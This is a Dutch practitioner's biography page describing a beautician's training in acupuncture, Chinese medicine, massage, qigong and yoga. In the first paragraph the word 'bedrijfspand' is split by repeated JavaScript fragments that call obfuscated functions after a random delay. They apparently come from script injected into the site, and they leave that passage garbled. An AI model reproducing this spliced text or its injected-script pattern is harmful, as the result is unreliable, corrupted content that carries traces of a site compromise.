Ria van Voorthuizen

Kijk op onze nieuwe Yoga pagina www.yogaria.nl 

In 1990 heb ik mijn diploma voor schoonheidsspecialiste gehaald. Ik ben toen direct een praktijk begonnen. Eerst aan huis. Maar mijn ene kamertje thuis was na drie jaar te klein geworden. Het bedrijf groeide en ik besloot de grote stap te wagen en verhuisde met het bedrijf naar een bedrijfspandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and. Zo kon ik de zaak verder laten groeien en niet zonder succes. Met veel enthousiasme deed ik telkens cursussen en bijscholingen. Allemaal op het gebied van gezichts- en lichaamsverzorging, huidverbetering en welzijn.

Het medische aspect en de Oosterse zienswijze hebben mij altijd al aangetrokken. Dus begon ik in 2002 dan eindelijk aan de opleiding die ik altijd al zo graag wilde doen; Acupunctuur (onderdeel van Traditionele Chinese Geneeswijze). Ik studeerde aan de Hwa To University en in de acupunctuurkliniek van Rangkuti liep ik drie jaar stage. Ik heb daar enorm veel praktijkervaring opgedaan. Ik was al enthousiast over acupunctuur maar door mijn studie en het meelopen in de praktijk werd het enthousiasme steeds groter. Het is echt zo bijzonder om te zien hoe mensen opknappen door het prikken van een paar flinterdunne naaldjes. Geweldig!

Om een goede combinatie van Oosterse en Westerse geneeswijze te kunnen toepassen volgde ik de HBO studie Westerse Medische Basiskennis aan Academie Qing Bai in Amsterdam. Sinds 2006 combineer ik in mijn praktijk acupunctuur en huidverzorging. Een prachtige combinatie.

Ik blijf mij verder verdiepen in de Chinese Geneeswijze. Ik heb de opleiding TuiNa massage therapeut gedaan, de opleiding Voedingsleer en de opleiding tot docent Zhineng Qigong en Yoga. Ik geef op diverse locaties Zhineng Qigong- en Yogalessen.

Geregistreerd en in bezit van vergunning (GGD) voor het uitvoeren van Permanente Make-Up.